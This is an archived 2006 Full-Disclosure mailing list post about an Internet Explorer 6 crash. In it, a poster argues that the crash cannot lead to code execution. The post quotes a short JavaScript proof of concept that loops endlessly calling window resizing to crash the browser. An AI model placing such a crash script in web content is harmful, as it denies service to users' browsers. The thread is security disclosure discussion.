[Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability

From: angray at beeb.net (Aaron Gray)
Subject: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
Date: Mon May 29 21:31:03 2006

>a simple crash can lead to code exec but some people don't have
>knowledge/time to research it. they just report the crash and leave it
>of somebody else to make the actual code execute. sometimes simple crash
>is simple crash :-)) sometimes simple crash is remote code exec.
>
>Javor Ninov aka DrFrancky
>http://securitydot.net/

Look at the original post and you will see there is no where to inject any 
code.

Aaron

>> <script>
>>  var wwidth = (window.innerWidth)?window.innerWidth:
>> ((document.all
>> )?document.body.offsetWidth:null);
>>
>>  while (wwidth)
>>  {
>> self.resizeBy(-999999, -1);
>>  }
>>
>> </script>

Follow-Ups:
- [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
  - From: Valdis.Kletnieks@xxxxxx
- [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
  - From: c0redump@xxxxxxxxxxxxx

References:
- [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
  - From: 0x80@xxxxxxx
- [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
  - From: Javor Ninov

Prev by Date: [Full-disclosure] VulnSale: IE 6.0.2900.2180.yeahlatestversion
Next by Date: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
Previous by thread: [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
Next by thread: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
Index(es):
- Date
- Thread

TechLists.org

Technical Mailing List Archives

Links

Lists

Latest Updates

[Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability